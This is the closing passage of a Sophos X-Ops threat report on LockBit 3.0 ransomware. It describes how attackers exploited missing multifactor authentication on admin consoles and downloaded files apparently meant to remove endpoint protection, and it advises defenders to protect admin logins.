Because these utilities are in widespread use, MDR and Rapid Response treat them all equally – as though an attack is underway – and immediately alert the targets when they’re detected.

We found the attackers took advantage of less-than-ideal security measures on the targeted networks. As we mentioned in our Active Adversaries Report on multiple ransomware attackers, the lack of multifactor authentication (MFA) on critical internal logins (such as management consoles) permits an intruder to use tooling that can sniff or keystroke-capture administrators’ passwords and then gain access to those consoles.

It’s safe to assume that experienced threat actors are at least as familiar with Sophos Central and other console tools as the legitimate users of those consoles, and they know exactly where to go to weaken or disable the endpoint protection software. In fact, in at least one incident involving a LockBit threat actor, we observed them downloading files which, from their names, appeared to be intended to remove Sophos protection: sophoscentralremoval-master.zip and sophos-removal-tool-master.zip. Protecting those admin logins is therefore among the most important steps admins can take to defend their networks.

For a list of IOCs associated with LockBit 3.0, please see our GitHub.

Acknowledgments

Sophos X-Ops acknowledges the collaboration of Colin Cowie, Gabor Szappanos, Alex Vermaning, and Steeve Gaudreault in producing this report.

Source:
https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/